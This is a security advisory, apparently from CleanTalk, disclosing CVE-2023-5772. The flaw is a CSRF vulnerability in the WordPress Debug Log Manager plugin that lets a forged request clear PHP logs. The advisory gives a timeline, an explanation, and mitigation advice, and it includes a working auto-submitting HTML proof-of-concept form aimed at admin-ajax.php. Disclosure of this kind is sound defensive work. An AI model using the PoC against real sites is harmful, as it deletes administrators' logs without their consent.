While conducting a security assessment of the Debug Log Manager plugin, a CSRF (Cross-Site Request Forgery) vulnerability was identified during testing. This vulnerability allows an attacker to clear PHP logs in the plugin without proper authorization. Specifically, the action=clear_log method is found to be vulnerable. It is recommended that the plugin author implement the wp_nonce check to enhance security.
Main info:
| CVE | CVE-2023-5772 |
| Plugin | Debug Log Manager |
| Critical | High |
| All Time | 12 969 |
| Active installations | 2000+ |
| Publicly Published | October 28, 2023 |
| Last Updated | October 28, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5772 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/debug-log-manager/debug-log-manager-220-cross-site-request-forgery |
| Plugin Security Certification by CleanTalk |  |
Timeline
| October 23, 2023 | Plugin testing and vulnerability detection in the Debug Log Manager plugin have been completed |
| October 23, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 27, 2023 | The author fixed the vulnerability and released the plugin update |
| October 28, 2023 | Registered CVE-2023-5772 |
Discovery of the Vulnerability
During testing, a CSRF vulnerability was discovered, which leads to clearing PHP logs in the plugin. The action=clear_log method is vulnerable. The plugin author needs to implement the wp_nonce check
Understanding of CSRF attack’s
CSRF is a type of attack where a malicious actor tricks a user into performing an unwanted action on a web application in which they are authenticated. In WordPress, CSRF attacks can target various functionalities, including those provided by plugins. In the case of the Debug Log Manager, the CSRF vulnerability allows an attacker to forge a request that, when executed by an authenticated user, triggers the clearing of PHP logs.
Exploiting the CSRF Vulnerability
Exploiting the CSRF vulnerability in the Debug Log Manager involves crafting a malicious web page or script that, when visited by an authenticated user, automatically triggers the action=clear_log method without the user’s knowledge. This can lead to the unintended removal of PHP logs.
POC code :
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://your_site/wordpress/wp-admin/admin-ajax.php”>
<input type=”hidden” name=”action” value=”clear_log” />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
___
The potential risk associated with this CSRF vulnerability is significant. An attacker exploiting this vulnerability could trick an authenticated user, such as an administrator, into unknowingly clearing PHP logs. This can disrupt debugging efforts and potentially lead to the loss of valuable information for diagnosing issues.
In a real-world scenario, an attacker might embed malicious code in a website or send a crafted link to a targeted user. If the targeted user, who has administrative privileges, visits the site or clicks the link while authenticated in the WordPress dashboard, the CSRF attack is executed.
Recommendations for Improved Security
- To address and mitigate the CSRF vulnerability in the Debug Log Manager plugin, the following recommendations are advised:
- Implementation of Nonce: The plugin author should implement wp_nonce checks for sensitive actions like clearing logs to prevent CSRF attacks.
- Educate Users: Administrators and users should be educated about the risks of clicking on untrusted links and the importance of logging out from their accounts when not in use.
- Security Audits: Conduct regular security audits to identify and remediate vulnerabilities promptly.
By implementing these security measures, administrators can reduce the risk of CSRF attacks and enhance the overall security of their WordPress environment.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
